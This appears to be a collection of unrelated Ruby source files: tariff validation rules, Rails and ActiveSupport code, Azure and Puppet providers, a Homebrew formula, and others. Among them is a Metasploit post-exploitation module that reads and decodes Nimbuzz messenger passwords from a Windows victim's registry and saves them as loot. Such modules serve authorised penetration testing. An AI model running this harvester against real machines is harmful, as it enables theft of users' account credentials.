(record.goods_nomenclature.blank? && record.export_refund_nomenclature.blank?) ||
(MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).any? &&
(record.goods_nomenclature.present? &&
GoodsNomenclatureIndent.where(goods_nomenclature_sid: record.goods_nomenclature_sid).where(
Sequel.lit('validity_start_date <= ?', record.validity_start_date)).where(
Sequel.lit('number_indents > 10 OR number_indents <= ?'), MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first.measure_explosion_level).any?
) ||
(record.export_refund_nomenclature.present? &&
record.export_refund_nomenclature.number_indents.present? &&
(record.export_refund_nomenclature.number_indents > 10 ||
record.export_refund_nomenclature.number_indents <= MeasureType.actual(include_future: true).where(measure_type_id: record.measure_type_id).first.measure_explosion_level)))
end
validation :ME104,
%(The justification regulation must be either:
- the measure’s measure-generating regulation, or
- a measure-generating regulation, valid on the day after the measure’s (explicit) end date.
If the measure’s measure-generating regulation is ‘approved’, then so must be the justification regulation) do |record|
valid = true
justification_regulation_present = record.justification_regulation_id.present? &&
record.justification_regulation.present?
if justification_regulation_present
# CASE 1:
#
# The justification regulation must be either the measure’s measure-generating regulation
#
valid = record.justification_regulation_id == record.measure_generating_regulation_id &&
record.justification_regulation_role == record.measure_generating_regulation_role
end
# puts ""
# puts " VALID after CASE 1: #{valid}"
# puts ""
# CASE 2:
#
# OR measure-generating regulation should be valid on the day after the measure’s (explicit) end date.
#
unless valid
if record.measure_generating_regulation_id.present?
valid = if record.generating_regulation.validity_end_date.present? &&
record.validity_end_date.present?
# puts ""
# puts "CASE 2-1"
# puts ""
record.generating_regulation.validity_end_date > record.validity_end_date
else
# puts ""
# puts "CASE 2-2"
# puts ""
# puts " record.validity_end_date: #{record.validity_end_date}"
# puts ""
# puts " record.generating_regulation.validity_end_date: #{record.generating_regulation.validity_end_date}"
# puts ""
# This means measure is valid record as its validity end date is `nil`
(
record.validity_end_date.blank? &&
record.generating_regulation.validity_end_date.blank?
)
end
end
end
# puts ""
# puts " VALID after CASE 2: #{valid}"
# puts ""
unless valid
if justification_regulation_present
# CASE 3:
# If the measure’s measure-generating regulation is ‘approved’,
# then so must be the justification regulation
#
# In other words: both should have `approved_flag`
#
unless valid
if record.measure_generating_regulation_id.present?
valid = record.generating_regulation.approved_flag.present? &&
record.justification_regulation.approved_flag.present?
end
end
end
end
# puts ""
# puts " VALID after CASE 3: #{valid}"
# puts ""
valid
end
validation :ME112, "If the additional code type has as application 'Export Refund for Processed Agricultural Goods' then the measure does not require a goods code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code.in?("4") } do |record|
record.goods_nomenclature_item_id.blank?
end
validation :ME113, "If the additional code type has as application 'Export Refund for Processed Agricultural Goods' then the additional code must exist as an Export Refund for Processed Agricultural Goods additional code.",
on: %i[create update],
if: ->(record) { record.additional_code_type.present? && record.additional_code_type.application_code == "4" } do |record|
record.additional_code.present? &&
AdditionalCodeType.export_refund_for_processed_agricultural_goods_type_ids.include?(
record.additional_code.additional_code_type_id
)
end
validation :ME115, 'The validity period of the referenced additional code must span the validity period of the measure', on: %i[create update] do
validates :validity_date_span, of: :additional_code, extend_message: true
end
validation :ME116, 'When a quota order number is used in a measure then the validity period of the quota order number must span the validity period of the measure. This rule is only applicable for measures with start date after 31/12/2007.',
on: %i[create update],
if: ->(record) {
record.validity_start_date.present? &&
record.validity_start_date > Date.new(2007, 12, 31) &&
record.order_number.present? && record.ordernumber =~ /^09[012356789]/
} do
# Only quota order numbers managed by the first come first served principle are in scope; these order number are starting with '09'; except order numbers starting with '094'
validates :validity_date_span, of: :order_number, extend_message: true
end
#
# NEED_TO_CHECK
#
# Would not work in Create Quota as here can be multiple origins.
# Need backend rework
#
# validation :ME117,
# %{When a measure has a quota measure type then rhe origin must exist as a quota order number origin.
# This rule is only applicable for measures with start date after 31/12/2007. Only origins for quota
# order numbers managed by the first come first served principle are in scope; these order number are
# starting with '09'; except order numbers starting with '094'},
# on: [:create, :update],
# if: ->(record) {
# ( record.validity_start_date > Date.new(2007,12,31) ) && (
# record.ordernumber.present? && record.ordernumber[0,2] == "09" && record.ordernumber[0,3] != "094"
# )
# } do |record|
# record.quota_order_number.present? && record.quota_order_number.quota_order_number_origin.present?
# end
validation :ME118,
%(When a quota order number is used in a measure then the validity period of the quota order number must
span the validity period of the measure. This rule is only applicable for measures with start date after
31/12/2007. Only quota order numbers managed by the first come first served principle are in scope;
these order number are starting with '09'; except order numbers starting with '094'),
on: %i[create update],
if: ->(record) {
(record.validity_start_date > Date.new(2007, 12, 31)) &&
(record.order_number.present? && record.ordernumber =~ /^09[012356789]/) &&
(record.ordernumber[0, 2] == "09" && record.ordernumber[0, 3] != "094")
} do
validates :validity_date_span, of: :order_number, extend_message: true
end
# FIXME: https://trello.com/c/COQPnHr2/602-dit-tq-128-edit-quota-measures-is-throwing-with-conformance-errors-needs-to-check-if-these-are-valid-me16-and-me119-6
# validation :ME119,
# %(When a quota order number is used in a measure then the validity period of the quota order number origin must
# span the validity period of the measure. This rule is only applicable for measures with start date after
# 31/12/2007. Only origins for quota order numbers managed by the first come first served principle are in scope;
# these order number are starting with '09'; except order numbers starting with '094'),
# if: ->(record) {
# (record.validity_start_date > Date.new(2007,12,31)) &&
# (record.order_number.present? && record.ordernumber =~ /^09[012356789]/) &&
# (record.ordernumber[0,2] == "09" && record.ordernumber[0,3] != "094") &&
# (record.quota_order_number_origin.present?)
# } do
# validates :validity_date_span, of: :quota_order_number_origin, extend_message: true
# end
end
| 51.649237 | 295 | 0.696124 |
5d0e0c21aa8ad915e2d204814f59fabe1eec600e | 1,897 | module ActiveSupport #:nodoc:
module CoreExtensions #:nodoc:
module String #:nodoc:
# Makes it easier to access parts of a string, such as specific characters and substrings.
module Access
# Returns the character at the +position+ treating the string as an array (where 0 is the first character).
#
# Examples:
# "hello".at(0) # => "h"
# "hello".at(4) # => "o"
# "hello".at(10) # => nil
def at(position)
self[position, 1]
end
# Returns the remaining of the string from the +position+ treating the string as an array (where 0 is the first character).
#
# Examples:
# "hello".from(0) # => "hello"
# "hello".from(2) # => "llo"
# "hello".from(10) # => nil
def from(position)
self[position..-1]
end
# Returns the beginning of the string up to the +position+ treating the string as an array (where 0 is the first character).
#
# Examples:
# "hello".to(0) # => "h"
# "hello".to(2) # => "hel"
# "hello".to(10) # => "hello"
def to(position)
self[0..position]
end
# Returns the first character of the string or the first +limit+ characters.
#
# Examples:
# "hello".first # => "h"
# "hello".first(2) # => "he"
# "hello".first(10) # => "hello"
def first(limit = 1)
self[0..(limit - 1)]
end
# Returns the last character of the string or the last +limit+ characters.
#
# Examples:
# "hello".last # => "o"
# "hello".last(2) # => "lo"
# "hello".last(10) # => "hello"
def last(limit = 1)
self[(-limit)..-1] || self
end
end
end
end
end
| 32.152542 | 132 | 0.488666 |
ed2194d1462e9fe0aefc2af57b51442a6eeb1c25 | 395 | class Admin::Resources::RolesController < Admin::ResourceController
include Paginatable
def index
if params[:sort_by] and not params[:q]
order_settings = params[:sort_by] + ' ' + @sort_order
@roles = @roles.reorder(order_settings)
end
end
private
def permitted_attributes
[ :name, role_permissions_attributes: [:id, :permission_id, :_destroy] ]
end
end
| 23.235294 | 76 | 0.696203 |
1de3ff456670732a818bb5541c93d0816d0cea74 | 4,111 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_4_0_36
module Models
#
# Load Information about a Service Fabric application.
#
class ApplicationLoadInfo
include MsRestAzure
# @return [String] The identity of the application. This is an encoded
# representation of the application name. This is used in the REST APIs
# to identify the application resource.
# Starting in version 6.0, hierarchical names are delimited with the "\~"
# character. For example, if the application name is
# "fabric:/myapp/app1",
# the application identity would be "myapp\~app1" in 6.0+ and
# "myapp/app1" in previous versions.
attr_accessor :id
# @return [Integer] The minimum number of nodes for this application.
# It is the number of nodes where Service Fabric will reserve Capacity in
# the cluster which equals to ReservedLoad * MinimumNodes for this
# Application instance.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :minimum_nodes
# @return [Integer] The maximum number of nodes where this application
# can be instantiated.
# It is the number of nodes this application is allowed to span.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :maximum_nodes
# @return [Integer] The number of nodes on which this application is
# instantiated.
# For applications that do not have application capacity defined this
# value will be zero.
attr_accessor :node_count
# @return [Array<ApplicationMetricDescription>] List of application
# capacity metric description.
attr_accessor :application_load_metric_information
#
# Mapper for ApplicationLoadInfo class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ApplicationLoadInfo',
type: {
name: 'Composite',
class_name: 'ApplicationLoadInfo',
model_properties: {
id: {
client_side_validation: true,
required: false,
serialized_name: 'Id',
type: {
name: 'String'
}
},
minimum_nodes: {
client_side_validation: true,
required: false,
serialized_name: 'MinimumNodes',
type: {
name: 'Number'
}
},
maximum_nodes: {
client_side_validation: true,
required: false,
serialized_name: 'MaximumNodes',
type: {
name: 'Number'
}
},
node_count: {
client_side_validation: true,
required: false,
serialized_name: 'NodeCount',
type: {
name: 'Number'
}
},
application_load_metric_information: {
client_side_validation: true,
required: false,
serialized_name: 'ApplicationLoadMetricInformation',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ApplicationMetricDescriptionElementType',
type: {
name: 'Composite',
class_name: 'ApplicationMetricDescription'
}
}
}
}
}
}
}
end
end
end
end
| 34.258333 | 81 | 0.55461 |
338ec679650bc79d7ec542304dd565c828805c7c | 2,968 | class H2o < Formula
desc "HTTP server with support for HTTP/1.x and HTTP/2"
homepage "https://github.com/h2o/h2o/"
url "https://github.com/h2o/h2o/archive/v2.0.1.tar.gz"
sha256 "c53d11589c8c76491cf3a940b649d0a9cb27c36eb276963811ac1bc16cd2bf2c"
head "https://github.com/h2o/h2o.git"
bottle do
sha256 "94098881d7365c50168602b7c13051a8c7d5358a42264cde6ac0e6fd92d5c07c" => :el_capitan
sha256 "259d407c805cd3c9a0430041311cb107ff53ae2ae6dddc48962fa71edb77e428" => :yosemite
sha256 "b824dcb480da033cff14a5450f5dec23aa2e2a6828dfb3880d477a18c9f77eef" => :mavericks
end
option "with-libuv", "Build the H2O library in addition to the executable"
option "without-mruby", "Don't build the bundled statically-linked mruby"
depends_on "cmake" => :build
depends_on "pkg-config" => :build
depends_on "openssl" => :recommended
depends_on "libressl" => :optional
depends_on "libuv" => :optional
depends_on "wslay" => :optional
def install
# https://github.com/Homebrew/homebrew-core/pull/1046
# https://github.com/Homebrew/brew/pull/251
ENV.delete("SDKROOT")
args = std_cmake_args
args << "-DWITH_BUNDLED_SSL=OFF"
args << "-DWITH_MRUBY=OFF" if build.without? "mruby"
system "cmake", *args
if build.with? "libuv"
system "make", "libh2o"
lib.install "libh2o.a"
end
system "make", "install"
(etc/"h2o").mkpath
(var/"h2o").install "examples/doc_root/index.html"
# Write up a basic example conf for testing.
(buildpath/"brew/h2o.conf").write conf_example
(etc/"h2o").install buildpath/"brew/h2o.conf"
end
# This is simplified from examples/h2o/h2o.conf upstream.
def conf_example; <<-EOS.undent
listen: 8080
hosts:
"127.0.0.1.xip.io:8080":
paths:
/:
file.dir: #{var}/h2o/
EOS
end
def caveats; <<-EOS.undent
A basic example configuration file has been placed in #{etc}/h2o.
You can find fuller, unmodified examples here:
https://github.com/h2o/h2o/tree/master/examples/h2o
EOS
end
plist_options :manual => "h2o"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>RunAtLoad</key>
<true/>
<key>KeepAlive</key>
<true/>
<key>ProgramArguments</key>
<array>
<string>#{opt_bin}/h2o</string>
<string>-c</string>
<string>#{etc}/h2o/h2o.conf</string>
</array>
</dict>
</plist>
EOS
end
test do
pid = fork do
exec "#{bin}/h2o -c #{etc}/h2o/h2o.conf"
end
sleep 2
begin
assert_match "Welcome to H2O", shell_output("curl localhost:8080")
ensure
Process.kill("SIGINT", pid)
Process.wait(pid)
end
end
end
| 28.266667 | 106 | 0.644879 |
4a6c4cc9676fe97621bb37888bd5ca37a811f023 | 276 | require 'spec_helper'
RSpec.describe App do
it 'returns http success' do
get '/'
expect(last_response).to be_ok
end
it 'creates a request record' do
expect {
get '/'
}.to change(Request, :count).by(1)
expect(Request.count).to eq(1)
end
end
| 17.25 | 38 | 0.637681 |
4a0123b33744294883b60c94e76f7c3ef3a00222 | 144 | class AddStakingToPaymentTransactions < ActiveRecord::Migration
def change
add_column :payment_transactions, :staking, :boolean
end
end
| 24 | 63 | 0.805556 |
6ae38b02d8263bf5c7cdd321138c0e88a7f28505 | 777 | Facter.add(:passalgo) do
confine :osfamily => "RedHat"
setcode do
algo = Facter::Core::Execution.exec("authconfig --test | grep hashing | awk '{print $5}'")
case algo
when /md5/
'md5'
when /sha256/
'sha256'
when /sha512/
'sha512'
when /descrypt/
'crypt'
when /bigcrypt/
'crypt'
else
'unknown'
end
end
end
Facter.add(:passalgo) do
confine :osfamily => "Solaris"
setcode do
algo = File.read('/etc/security/policy.conf').scan(/^CRYPT_DEFAULT=(.+)/)
case algo[0][0].to_s
when /1/
'md5'
when /2a/
'blowfish'
when /md5/
'sunmd5'
when /5/
'sha256'
when /6/
'sha512'
when /unix/
'crypt'
else
'unknown'
end
end
end
| 17.659091 | 94 | 0.537967 |
0380d7e554863161558244363d5e17131ad8bcae | 1,117 | shared_context :common_context do
let(:app_id) { ENV['D2L_API_ID'] }
let(:app_key) { ENV['D2L_API_KEY'] }
let(:auth_host) { D2L::Valence::Host.new(scheme: :https, host: 'partners.brightspace.com') }
let(:api_version) { '1.0'}
let(:app_context) do
D2L::Valence::AppContext.new(
brightspace_host: auth_host,
app_id: app_id,
app_key: app_key,
api_version: api_version
)
end
let(:auth_token_parameters) do
[
D2L::Valence::AuthTokens::APP_ID_PARAM,
D2L::Valence::AuthTokens::SIGNATURE_BY_APP_KEY_PARAM,
D2L::Valence::AuthTokens::USER_ID_PARAM,
D2L::Valence::AuthTokens::SIGNATURE_BY_USER_KEY_PARAM,
D2L::Valence::AuthTokens::TIMESTAMP_PARAM
]
end
let(:callback_uri) { URI('https://apitesttool.desire2learnvalence.com/index.php') }
let(:auth_key) { D2L::Valence::Encrypt.generate_from(app_key, callback_uri.to_s) }
let(:user_context) do
D2L::Valence::UserContext.new(
app_context: app_context,
user_id: user_id,
user_key: user_key
)
end
let(:user_id) { '3' }
let(:user_key) { 'Vi9NYNbK-l3L' }
end | 30.189189 | 94 | 0.675918 |
61ee3a02e886cc5472c96effde3ff3d0a1a917f6 | 2,172 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/auxiliary/report'
class MetasploitModule < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info( info,
'Name' => 'Windows Gather Nimbuzz Instant Messenger Password Extractor',
'Description' => %q{
This module extracts the account passwords saved by Nimbuzz Instant
Messenger in hex format.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
'Unknown', # SecurityXploded Team, www.SecurityXploded.com
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
end
def run
creds = Rex::Ui::Text::Table.new(
'Header' => 'Nimbuzz Instant Messenger Credentials',
'Indent' => 1,
'Columns' =>
[
'User',
'Password'
]
)
registry_enumkeys('HKU').each do |k|
next unless k.include? "S-1-5-21"
next if k.include? "_Classes"
vprint_status("Looking at Key #{k}")
subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\")
if subkeys == nil or subkeys == ""
print_status ("Nimbuzz Instant Messenger not installed for this user.")
return
end
user = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Username") || ""
hpass = registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", "Password")
next if hpass == nil or hpass == ""
hpass =~ /.{11}(.*)./
decpass = [$1].pack("H*")
print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass]
end
print_status("Storing data...")
path = store_loot(
'nimbuzz.user.creds',
'text/csv',
session,
creds.to_csv,
'nimbuzz_user_creds.csv',
'Nimbuzz User Credentials'
)
print_status("Nimbuzz user credentials saved in: #{path}")
end
end
| 27.493671 | 107 | 0.589779 |
5d26815d2495839b77c8e98e58250a35ad3075d3 | 1,976 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# In the development environment your application's code is reloaded on
# every request. This slows down response time but is perfect for development
# since you don't have to restart the web server when you make code changes.
config.cache_classes = false
# Do not eager load code on boot.
config.eager_load = false
# Show full error reports.
config.consider_all_requests_local = true
# Enable/disable caching. By default caching is disabled.
if Rails.root.join('tmp/caching-dev.txt').exist?
config.action_controller.perform_caching = true
config.cache_store = :memory_store
config.public_file_server.headers = {
'Cache-Control' => "public, max-age=#{2.days.seconds.to_i}"
}
else
config.action_controller.perform_caching = false
config.cache_store = :null_store
end
# Don't care if the mailer can't send.
config.action_mailer.raise_delivery_errors = false
config.action_mailer.perform_caching = false
# Print deprecation notices to the Rails logger.
config.active_support.deprecation = :log
# Raise an error on page load if there are pending migrations.
config.active_record.migration_error = :page_load
# Debug mode disables concatenation and preprocessing of assets.
# This option may cause significant delays in view rendering with a large
# number of complex assets.
config.assets.debug = true
# Suppress logger output for asset requests.
config.assets.quiet = true
# Raises error for missing translations
# config.action_view.raise_on_missing_translations = true
# Use an evented file watcher to asynchronously detect changes in source code,
# routes, locales, etc. This feature depends on the listen gem.
config.file_watcher = ActiveSupport::EventedFileUpdateChecker
# Application configuration
configatron.ga.tracking_id = 'UA-64301219-2'
end
| 34.068966 | 85 | 0.76164 |
e225b4587785c32aab037d4231a4f00a904709c8 | 711 | require_relative 'boot'
require 'rails'
require 'active_model/railtie'
require 'active_record/railtie'
require 'action_controller/railtie'
require './config/initializers/modules.rb'
Bundler.require(*Rails.groups)
module ExpertPalmTree
class Application < Rails::Application
config.load_defaults 6.0
config.api_only = true
config.application = config_for(:application)
config.active_record.schema_format = :sql
config.generators do |g|
g.orm :active_record, primary_key_type: :uuid
g.test_framework :rspec, views: false
g.fixture_replacement :factory_bot, dir: 'spec/factories'
g.assets = false
g.view_specs = false
g.helper = false
end
end
end
| 26.333333 | 63 | 0.732771 |
3979258cdf1ca2af15c4278db81a67675c69e8da | 3,027 | require 'prawn/core'
require 'prawn/format'
require "prawn/measurement_extensions"
require 'gruff'
require "open-uri"
module Pdf
module Finance
class InvoiceGenerator
include Pdf::Printer
# TODO: remove
include ActionView::Helpers::NumberHelper
include ThreeScale::MoneyHelper
include ::Finance::InvoicesHelper
def initialize(invoice_data)
@data = invoice_data
@coder = HTMLEntities.new
# TODO: accept as parameter
@style = Pdf::Styles::BlackAndWhite.new
@pdf = Prawn::Document.new(:page_size => 'A4',
:page_layout => :portrait)
@pdf.tags(@style.tags)
@pdf.font(@style.font)
end
# Generates PDF content and wraps it to envelope acceptable by Paperclip
def generate_as_attachment
InvoiceAttachment.new(@data, generate)
end
def generate
two_columns do |column|
case column
when :left
@pdf.image(@data.logo, :fit => [200,50], :position => :left) if @data.has_logo?
when :right
print_address(@data.buyer)
end
end
move_down(14)
@pdf.text "Invoice for #{@data.name}", :size => 20, :align => :center
move_down(14)
subtitle('<b>Details</b>')
print_details
move_down(3)
# TODO: cleanup the constants
two_columns( [ 0.mm, @pdf.cursor ], :height => 50.mm) do |column|
case column
when :left then print_address( @data.provider, 'Issued by')
when :right then print_address( @data.buyer, 'For')
end
end
move_down(5)
print_line_items
move_down(5)
print_line
move_down
print_total
move_down(2)
@pdf.text @data.invoice_footnote
move_down
@pdf.render
end
private
def print_address(person, name = nil)
subtitle("<b>#{name}</b>") if name
@pdf.table(person, @style.table_style.merge(:width => TABLE_HALF_WIDTH))
end
def print_details
details = [ [ 'Invoice ID', @data.friendly_id ],
[ 'Issued on', @data.issued_on ],
[ 'Billing period start', @data.period_start ],
[ 'Billing period end', @data.period_end ],
[ 'Due on', @data.due_on ] ]
@pdf.table(details, @style.table_style)
end
def print_line_items
opts = { :width => TABLE_FULL_WIDTH, :headers => InvoiceReportData::LINE_ITEMS_HEADING }
@pdf.table(@data.line_items, @style.table_style.merge(opts))
move_down
@pdf.text(@data.vat_zero_text) if @data.vat_rate == 0
end
def print_total
@pdf.bounding_box([@pdf.bounds.right - 310, @pdf.cursor], :width => 310) do
@pdf.text "<b>AMOUNT DUE: #{@coder.decode(rounded_price_tag(@data.cost))}</b>", :size => 13, :align => :right
end
end
end
end
end
| 27.518182 | 119 | 0.570862 |
acefca8427bf20489198ec3d54a5778c228a778e | 922 | $LOAD_PATH.unshift File.dirname(__FILE__)
require 'helper'
class AliasTest < Test::Unit::TestCase
def test_alias
instructions = hub("alias")
assert_includes "bash", instructions
assert_includes "sh", instructions
assert_includes "csh", instructions
assert_includes "zsh", instructions
assert_includes "fish", instructions
end
def test_alias_silent
assert_equal "alias git=hub\n", hub("alias -s bash")
end
def test_alias_bash
assert_alias_command "bash", "alias git=hub"
end
def test_alias_sh
assert_alias_command "sh", "alias git=hub"
end
def test_alias_zsh
assert_alias_command "zsh", "alias git=hub"
end
def test_alias_csh
assert_alias_command "csh", "alias git hub"
end
def test_alias_fish
assert_alias_command "fish", "alias git hub"
end
def test_alias_blah
assert_alias_command "blah", "fatal: never heard of `blah'"
end
end
| 21.952381 | 63 | 0.722343 |
1cdecdff2b2361980e049f88735e7e6d7b940c32 | 407 | require "vagrant"
module VagrantPlugins
module GuestSolaris
class Plugin < Vagrant.plugin("1")
name "Solaris guest."
description "Solaris guest support."
config("solaris") do
require File.expand_path("../config", __FILE__)
Config
end
guest("solaris") do
require File.expand_path("../guest", __FILE__)
Guest
end
end
end
end
| 19.380952 | 55 | 0.611794 |
f742edc5915a2f35f6cd23e1eb28d1c724bf682a | 23,330 | # require "pry"
# require "pry-rescue"
require "json"
Puppet::Type.type(:azure_ddos_protection_plan).provide(:arm) do
mk_resource_methods
def initialize(value = {})
super(value)
@property_flush = {}
@is_create = false
@is_delete = false
end
def etag=(value)
Puppet.info("etag setter called to change to #{value}")
@property_flush[:etag] = value
end
def id=(value)
Puppet.info("id setter called to change to #{value}")
@property_flush[:id] = value
end
def location=(value)
Puppet.info("location setter called to change to #{value}")
@property_flush[:location] = value
end
def name=(value)
Puppet.info("name setter called to change to #{value}")
@property_flush[:name] = value
end
def properties=(value)
Puppet.info("properties setter called to change to #{value}")
@property_flush[:properties] = value
end
def tags=(value)
Puppet.info("tags setter called to change to #{value}")
@property_flush[:tags] = value
end
def type=(value)
Puppet.info("type setter called to change to #{value}")
@property_flush[:type] = value
end
def self.instances
fetch_all_as_hash
end
def self.prefetch(resources)
instances.each do |prov|
if (resource = (resources.find { |k, v| k.casecmp(prov.name).zero? } || [])[1])
resource.provider = prov
end
end
end
def self.fetch_all_as_hash
items = self.fetch_all
if items
items.collect do |item|
hash = {
api_version: item["api-version"],
etag: item["etag"],
id: item["id"],
location: item["location"],
name: item["name"],
parameters: item["parameters"],
properties: item["properties"],
resource_group_name: item["resourceGroupName"],
subscription_id: item["subscriptionId"],
tags: item["tags"],
type: item["type"],
ensure: :present,
}
self.deep_delete(hash, [:etag])
self.deep_delete(hash, [:id])
self.deep_delete(hash, [:properties, "provisioningState"])
self.deep_delete(hash, [:properties, "resourceGuid"])
self.deep_delete(hash, [:properties, "virtualNetworks"])
self.deep_delete(hash, [:type])
Puppet.debug("Adding to collection: #{item}")
new(hash) if hash
end.compact
else
[]
end
rescue Exception => ex
Puppet.alert("ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
def self.deep_delete(hash_item, tokens)
if tokens.size == 1
if hash_item.kind_of?(Array)
hash_item.map! { |item| deep_delete(item, tokens) }
else
hash_item.delete(tokens[0]) unless hash_item.nil? or hash_item[tokens[0]].nil?
end
else
if hash_item.kind_of?(Array)
hash_item.map! { |item| deep_delete(item, tokens[1..-1]) }
else
hash_item[tokens.first] = deep_delete(hash_item[tokens.first], tokens[1..-1]) unless hash_item.nil? or hash_item[tokens[0]].nil?
end
end
return hash_item
end
def self.fetch_all
response = invoke_list_all
if response.kind_of? Net::HTTPSuccess
body = JSON.parse(response.body)
if body.is_a? Hash and body.key? "value"
return body["value"]
end
end
end
def self.instance_to_hash(instance)
{
ensure: :present,
api_version: instance.api_version.respond_to?(:to_hash) ? instance.api_version.to_hash : instance.api_version,
etag: instance.etag.respond_to?(:to_hash) ? instance.etag.to_hash : instance.etag,
id: instance.id.respond_to?(:to_hash) ? instance.id.to_hash : instance.id,
location: instance.location.respond_to?(:to_hash) ? instance.location.to_hash : instance.location,
name: instance.name.respond_to?(:to_hash) ? instance.name.to_hash : instance.name,
parameters: instance.parameters.respond_to?(:to_hash) ? instance.parameters.to_hash : instance.parameters,
properties: instance.properties.respond_to?(:to_hash) ? instance.properties.to_hash : instance.properties,
resource_group_name: instance.resource_group_name.respond_to?(:to_hash) ? instance.resource_group_name.to_hash : instance.resource_group_name,
subscription_id: instance.subscription_id.respond_to?(:to_hash) ? instance.subscription_id.to_hash : instance.subscription_id,
tags: instance.tags.respond_to?(:to_hash) ? instance.tags.to_hash : instance.tags,
type: instance.type.respond_to?(:to_hash) ? instance.type.to_hash : instance.type,
object: instance,
}
end
def create
@is_create = true
Puppet.info("Entered create for resource #{name} of type DdosProtectionPlan")
hash = build_hash
response = self.class.invoke_create(resource, hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info("Added :ensure to property hash")
else
raise Puppet::Error, "Create failed. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during create. The state of the resource is unknown. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
def flush
Puppet.info("Entered flush for resource #{name} of type DdosProtectionPlan - creating ? #{@is_create}, deleting ? #{@is_delete}")
if @is_create || @is_delete
return # we've already done the create or delete
end
hash = build_hash
response = self.class.invoke_update(resource, hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info("Added :ensure to property hash")
else
raise Puppet::Error, "Flush failed. The state of the resource is unknown. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during flush. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
def build_hash
ddos_protection_plan = {}
ddos_protection_plan["etag"] = resource[:etag] unless resource[:etag].nil?
ddos_protection_plan["id"] = resource[:id] unless resource[:id].nil?
ddos_protection_plan["location"] = resource[:location] unless resource[:location].nil?
ddos_protection_plan["name"] = resource[:name] unless resource[:name].nil?
ddos_protection_plan["properties"] = resource[:properties] unless resource[:properties].nil?
ddos_protection_plan["tags"] = resource[:tags] unless resource[:tags].nil?
ddos_protection_plan["type"] = resource[:type] unless resource[:type].nil?
return ddos_protection_plan
end
def self.build_key_values
key_values = {}
key_values["api-version"] = "2018-11-01"
key_values
end
def destroy
delete(resource)
end
def delete(hash)
Puppet.info("Entered delete for resource #{hash[:name]} of type <no value>")
@is_delete = true
response = self.class.invoke_delete(hash)
if response.is_a? Net::HTTPSuccess
@property_hash[:ensure] = :present
Puppet.info "Added :absent to property_hash"
else
raise Puppet::Error, "Delete failed. The state of the resource is unknown. Response is #{response} and body is #{response.body}"
end
rescue Exception => ex
Puppet.alert("Exception during destroy. ex is #{ex} and backtrace is #{ex.backtrace}")
raise
end
def self.invoke_list_all(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_List")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("properties", "body", "properties", "properties"),
self.op_param("subscriptionId", "path", "subscription_id", "subscription_id"),
self.op_param("tags", "body", "tags", "tags"),
self.op_param("type", "body", "type", "type"),
]
op_params.each do |i|
inquery = i[:inquery]
name = i[:name]
paramalias = i[:paramalias]
name_snake = i[:namesnake]
if inquery == "query"
query_params[name] = key_values[name] unless key_values[name].nil?
query_params[name] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
query_params[name] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
else
path_params[name_snake.to_sym] = key_values[name] unless key_values[name].nil?
path_params[name_snake.to_sym] = ENV["azure_#{name_snake}"] unless ENV["azure_#{name_snake}"].nil?
path_params[name_snake.to_sym] = resource[paramalias.to_sym] unless resource.nil? || resource[paramalias.to_sym].nil?
end
end
self.call_op(path_params, query_params, header_params, body_params, "management.azure.com", "/subscriptions/%{subscription_id}/providers/Microsoft.Network/ddosProtectionPlans", "Get", "[application/json]")
end
def self.invoke_create(resource = nil, body_params = nil)
key_values = self.build_key_values
Puppet.info("Calling operation DdosProtectionPlans_CreateOrUpdate")
path_params = {}
query_params = {}
header_params = {}
header_params["User-Agent"] = "puppetlabs-azure_arm/0.2.1"
op_params = [
self.op_param("api-version", "query", "api_version", "api_version"),
self.op_param("ddosProtectionPlanName", "path", "name", "ddos_protection_plan_name"),
self.op_param("etag", "body", "etag", "etag"),
self.op_param("id", "body", "id", "id"),
self.op_param("location", "body", "location", "location"),
self.op_param("name", "body", "name", "name"),
self.op_param("parameters", "body", "parameters", "parameters"),
